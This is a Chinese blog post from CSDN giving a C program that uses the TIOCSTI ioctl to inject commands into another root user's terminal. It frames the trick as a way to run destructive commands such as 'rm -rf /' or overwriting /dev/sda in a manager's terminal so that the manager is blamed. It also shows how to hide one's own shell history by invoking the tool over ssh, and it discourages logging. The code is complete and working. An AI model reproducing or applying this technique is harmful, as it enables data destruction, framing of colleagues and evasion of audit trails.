在别人的终端上执行Linux命令

最新推荐文章于 2022-08-20 22:15:10 发布
最新推荐文章于 2022-08-20 22:15:10 发布
阅读量1.4w 收藏 312
点赞数 83
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dog250/article/details/103928192
版权

你想偷偷摸摸干点不好的事吗?

我的意思是,你干点坏事,比如把机器给halt,比重要文件删了,然后让人觉得这是别人干的,说白了,就是嫁祸于人,特别是经理,你想吗?

本文我将提供一个比较low的偏门技巧。

很多情况下,我们都用root登录一台服务器,并且不止一个人以root登录,像这样:
在这里插入图片描述
可以看到分别打开了两个tty终端:
在这里插入图片描述
我们希望在别人打开的其它终端中执行一些可怕的命令,比如 “rm -rf /”“echo aaa >/dev/sda” … 当有人查起来,趁着程序还在内存中,你可以说, “不是我干的啊,是经理干的啊,不信,你去看看经理终端的history!”

嗯!

好了,现在,我希望在pts/1上输入一个命令,让它在pts/0上执行。效果是这样子的:
在这里插入图片描述
你可能觉得还需要考虑如何隐藏掉下面的history:

    7  ./a.out /dev/pts/0 pwd

简单,直接在另一台你自己的机器上搞呗:

ssh root@192.168.56.110 "/root/a.out /dev/pts/0 'echo 经理的皮鞋不会胖'"

你看,干干净净:
在这里插入图片描述

如何做到的呢?

秘密就在a.out中了。

这是一个非常简单的程序,代码如下:

#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>

int main(int argc, char **argv)
{
  char tty[16] = {0};
  char cmd[64] = {0};
  char tmp[2] = {0};
  int len, i;
  int fd;

  strncpy(tty, argv[1], strlen(argv[1]));
  strncpy(cmd, argv[2], strlen(argv[2]));
  len = strlen(cmd);
  fd = open(tty, O_RDWR);

  for (i = 0; i < len; i++) {
    sprintf(tmp, "%c ", cmd[i]);
    ioctl(fd, TIOCSTI, tmp);
  }
  ioctl(fd, TIOCSTI, "\n ");
}

当然,你可以 替别人(特别是经理) 执行任何命令,毕竟你们都是root嘛…

还不赶紧去试试?

开玩笑了,这篇文章其实没有什么技术含量,你只要知道TIOCSTI这个command就能写出这程序,这一点我在很久之前的文章里就有说过:
https://blog.csdn.net/dog250/article/details/5692612

所以说,也就不要纠结这程序在没有root的时候没有用了…没有root给你给终端你也干不了什么坏事,所谓的坏事就是大家都有root的情况相互甩锅,抵赖。

另外,也不要总想着通过配置sshd来记录ssh远程执行的命令从而缉拿真正的捣乱分子,只是玩玩儿,何必什么事都当真去较真儿呢?

浙江温州皮鞋湿,下雨进水不会胖。

dog250
关注
  • 83
    点赞
  • 312
    收藏
    觉得还不错? 一键收藏
  • 18
    评论
发送一个命令到其他的终端执行
sdcxyz的专栏
05-16 2916
#include #include #include #include #include #include #include void print_help(char *prog_name) { printf("Usage: %s [-n] DEVNAME COMMAND\n", prog_name); printf("Usage: '-n' is
Linux利用终端执行命令,linux – 通过/ dev / pts在另一个终端执行命令
weixin_31919471的博客
04-28 259
我完全得到了你的要求.您可以通过在C中编写和执行一小段代码来实现此目的.这应该会给你一些想法.#include #include #include #include #include #include #include void print_help(char *prog_name) {printf("Usage: %s [-n] DEVNAME COMMAND\n",prog_name);pri...
如何向不同的终端执行命令
weixin_43010385的博客
08-20 449
tty
linux远程到其他机器执行循环脚本
qq_43670527的博客
04-13 1210
远程登录其他机器执行shell循环脚本
linux常用的终端命令,常用Linux终端命令(示例代码)
weixin_34725745的博客
05-03 463
1 命令行日常系快捷键:CTRL + U - 剪切光标前的内容CTRL + K - 剪切光标至行末的内容CTRL + Y - 粘贴CTRL + E - 移动光标到行末CTRL + A - 移动光标到行首ALT + F - 跳向下一个空格ALT + B - 跳回上一个空格ALT + Backspace - 删除前一个单词CTRL + W - 剪切光标前一个单词Shift + Insert - 向终端...
程序员在linux下有用的终端命令
08-18
Linux 终端命令是程序员在 Linux 下工作时的必备技能,本文总结了多条实用的终端命令,涵盖文件编码转换、ISO 文件挂载、启动系统修改、软件安装、历史命令记录、Bash Shell 快捷键等多方面的内容。 一、文件编码...
在IDEA中使用Linux命令的操作方法
09-14
在集成开发环境(Integrated...无论你是使用Git Bash还是WSL,都可以在IDEA的Terminal中无缝地执行Linux命令,进行日常的开发工作。通过熟练掌握这些技巧,可以提高跨平台开发的效率,同时享受Linux命令带来的强大功能。
Linux下使用SSH远程执行命令方法收集
09-14
Linux系统中,SSH(Secure Shell)是一种广泛使用的网络协议,用于安全地远程登录到另一台计算机并执行命令。SSH提供了加密的网络通信,确保数据传输的安全性。本篇文章将详细探讨如何在Linux环境下利用SSH远程...
在后台运行Linux命令的方法
01-09
Linux系统中,后台运行命令是一项非常实用的功能,它允许用户在执行长时间运行的程序时,继续在同一个shell会话中进行其他操作。这主要通过将命令与`&`符号结合来实现。例如,要将命令`command`放到后台运行,只需...
Linux获取10个你最常用的终端命令列表
09-15
总结来说,了解并熟练掌握这些基本的Linux命令是提升工作效率的关键。通过分析命令使用情况,我们可以更好地了解自己的工作模式,并可能找到改进的地方。无论你是开发者、系统管理员还是普通用户,理解并善用这些...
linux如何设置开启在指定的tty下自启动程序
u012380981的博客
06-29 1036
默认情况下,ttyX在系统启动之后默认调用/usr/bin/login程序,等待用户输入用户名和密码。 所以,如果想在系统开机之后在ttyX下自动启动程序,只需要写一个启动脚本 autologin程序来替换掉/usr/bin/login程序即可 实现开机自动启动指定的程序。 1.比如实现无需输入用户名和密码的自动登录 2或者实现运行用户指定的应用程序。 对于2: 1)可以建立这样的autologin启动脚本,内容如下 !/bin/bash/ cd /home/dpu/dp...
从一个终端向另一个终端输出数据
CSDN博客
04-16 1394
输入tty 查看每个终端当前所在的位置。 比如第一个在 /dev/pts/0 第二个在 /dev/pts/1 那么可以在第一个终端(也就是/dev/pts/0)中输入 echo "abc" >/dev/pts/1 这样第二个终端就显示abc ...
Linux下打开一个新的终端运行程序的脚本
星光
10-25 3305
在ROS程序中经常涉及到需要打开多个终端运行程序的情况,通常ROS程序会包含多个节点,而每个节点都需要在一个终端中运行,在脚本中打开新的终端并在其中运行程序的方法如下 gnome-terminal -x bash -c "命令" 命令可以是终端指令或者另一个脚本程序,如 "roscore" "roslaunch proj prog.launch" "./test.sh" 等,如果执行多个命令,可以用分号隔开,如 "test1.sh; test2.sh" 在有些程序启动需要等待前面的程序启动完
超详细open vn搭建之Linux亲测可用
热门推荐
zzchances的博客
03-31 4万+
vn 搭建实操 1 安装 2 配置 2.1CA证书 2.2Server证书 2.3客户端证书 2.4归档证书 3 配置 3.1配置服务端 3.2windows客户端配置 前言:VPN直译就是虚拟专用通道,是提供给企业之间或者个人与公司之间安全数据传输的隧道,OpenVPN无疑是Linux下开源VPN的先锋,提供了良好的性能和友好的用户GUI。 1 安装 (1)配置ep...
Linux命令基础34-如何在一个终端一次运行多个命令
Anthony_tester的博客
05-18 3958
首先,你是否考虑过,在输入多个命令后,敲击回车,希望这多个命令都被执行。其实linux是允许这样做的。 1. 采用分号(;)分隔多个命令 2. 采用两个连接符(&&) 3.如果命令之间有一个命令写错,不影响其他命令执行
Linux(一)——命令行模式下命令的运行
晃在云淡风轻
06-04 1万+
用户都是通过程序在跟系统做沟通的,命令行模式登陆后所运行的程序被称为壳(shell),这个程序负责跟用户沟通。 Linux的壳程序就是BASH。 命令 整个命令执行方式非常简单,需要熟悉几个重要的概念。 [dave@localhost ~]$ command [-options] parameter1 parameter2 ... [用户@主机名 所在目录(~)]$ 命令 选项 参数一 参数二 ...
shell脚本 实现在一个终端里打开另一个终端执行命令
qq_43625014的博客
11-15 1万+
在一个终端里打开另一个终端: gnome-terminal --window 脚本实现在一个新的终端里使用ssh远程连接服务器,然后在服务器里执行相关操作,脚本: a.sh gnome-terminal -e 'bash -c "sh b.sh;exec bash"' b.sh ssh root@ipaddress -t "ls" 但是在服务器里无法执行操作,改成下面这样就ok: b.sh ...
Linux 下在Shell脚本中创建新终端
wutong_login的专栏
01-02 2万+
gnome-terminal -t "title-name" -x bash -c "sh ./run.sh;exec bash;" -t 为打开终端的标题,便于区分。 -x 后面的为要在打开的终端执行的脚本,根据需要自己修改就行了。 最后的exec bash;是让打开的终端执行完脚本后不关闭。
Python在Linux终端执行命令输出结果转为文本
最新发布
06-07
Linux终端中,你可以使用`subprocess`模块来在Python中执行命令并获取输出结果。以下是一个示例代码: ```python import subprocess # 执行命令并获取输出结果 result = subprocess.run(['ls'], capture_output=True, text=True) # 输出结果 print(result.stdout) ``` 在这个示例中,我们使用`subprocess.run`方法来执行`ls`命令,并将其输出结果存储在`result`变量中。为了捕获输出结果,我们使用了`capture_output=True`参数,并使用`text=True`参数将输出结果转换为文本。最后,我们使用`print`方法输出文本结果。 需要注意的是,`capture_output`和`text`参数只在Python 3.7及以上版本中可用。如果你的Python版本低于3.7,可以使用`subprocess.PIPE`参数来捕获输出结果,并使用`decode`方法将其转换为文本。例如: ```python import subprocess # 执行命令并获取输出结果 result = subprocess.run(['ls'], stdout=subprocess.PIPE) # 将输出结果转为文本 output = result.stdout.decode('utf-8') # 输出结果 print(output) ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 18
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值